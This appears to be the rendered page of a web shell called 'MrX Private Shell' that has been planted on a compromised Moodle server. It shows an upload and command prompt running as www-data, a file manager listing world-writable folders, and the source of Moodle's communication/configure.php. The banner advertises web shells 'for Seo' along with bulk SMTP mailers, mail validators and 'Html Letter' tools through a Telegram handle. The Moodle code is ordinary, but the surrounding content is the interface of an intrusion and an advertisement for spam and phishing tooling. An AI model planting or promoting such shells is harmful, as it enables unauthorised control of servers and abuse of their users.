__  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

www-data@216.73.216.10: ~ $
<?php
// This file is part of Moodle - http://moodle.org/
//
// Moodle is free software: you can redistribute it and/or modify
// it under the terms of the GNU General Public License as published by
// the Free Software Foundation, either version 3 of the License, or
// (at your option) any later version.
//
// Moodle is distributed in the hope that it will be useful,
// but WITHOUT ANY WARRANTY; without even the implied warranty of
// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
// GNU General Public License for more details.
//
// You should have received a copy of the GNU General Public License
// along with Moodle.  If not, see <http://www.gnu.org/licenses/>.

/**
 * Configure communication for a given instance.
 *
 * @package    core_communication
 * @copyright  2023 David Woloszyn <david.woloszyn@moodle.com>
 * @license    http://www.gnu.org/copyleft/gpl.html GNU GPL v3 or later
 */

require_once('../config.php');
require_once('lib.php');

require_login();

$contextid = required_param('contextid', PARAM_INT);
$instanceid = required_param('instanceid', PARAM_INT);
$instancetype = required_param('instancetype', PARAM_TEXT);
$component = required_param('component', PARAM_COMPONENT);
$selectedcommunication = optional_param('selectedcommunication', null, PARAM_PLUGIN);

$context = \core\context::instance_by_id($contextid);
$instanceinfo = [
    'contextid' => $context->id,
    'instanceid' => $instanceid,
    'instancetype' => $instancetype,
    'component' => $component,
];

// Requires communication to be enabled.
if (!core_communication\api::is_available()) {
    throw new \moodle_exception('communicationdisabled', 'communication');
}

// Attempt to load the communication instance with the provided params.
$communication = \core_communication\api::load_by_instance(
    context: $context,
    component: $component,
    instancetype: $instancetype,
    instanceid: $instanceid,
    provider: $selectedcommunication,
);

// No communication, no way this form can be used.
if (!$communication) {
    throw new \moodle_exception('nocommunicationinstance', 'communication');
}

// Set variables according to the component callback and use them on the page.
[$instance, $context, $heading, $returnurl] = component_callback(
    $component,
    'get_communication_instance_data',
    [$instanceid]
);

// Set up the page.
$PAGE->set_context($context);
$PAGE->set_url('/communication/configure.php', $instanceinfo);
$PAGE->set_title(get_string('communication', 'communication'));
$PAGE->set_heading($heading);
$PAGE->add_body_class('limitedwidth');

// Append the instance data before passing to form object.
$instanceinfo['instancedata'] = $instance;

// Get our form definitions.
$form = new \core_communication\form\configure_form(
    context: $context,
    instanceid: $instanceinfo['instanceid'],
    instancetype: $instanceinfo['instancetype'],
    component: $instanceinfo['component'],
    selectedcommunication: $selectedcommunication,
    instancedata: $instanceinfo['instancedata'],
);


if ($form->is_cancelled()) {
    redirect($returnurl);
} else if ($data = $form->get_data()) {
    component_callback($component, 'update_communication_instance_data', [$data]);
    redirect($returnurl);
}

// Display the page contents.
echo $OUTPUT->header();
echo $OUTPUT->heading(get_string('communication', 'communication'), 2);
$form->display();
echo $OUTPUT->footer();

Filemanager

Name Type Size Permission Actions
amd Folder 0777
classes Folder 0777
provider Folder 0777
tests Folder 0777
UPGRADING.md File 304 B 0777
configure.php File 3.34 KB 0777
lib.php File 1.84 KB 0777
upgrade.txt File 227 B 0777
Filemanager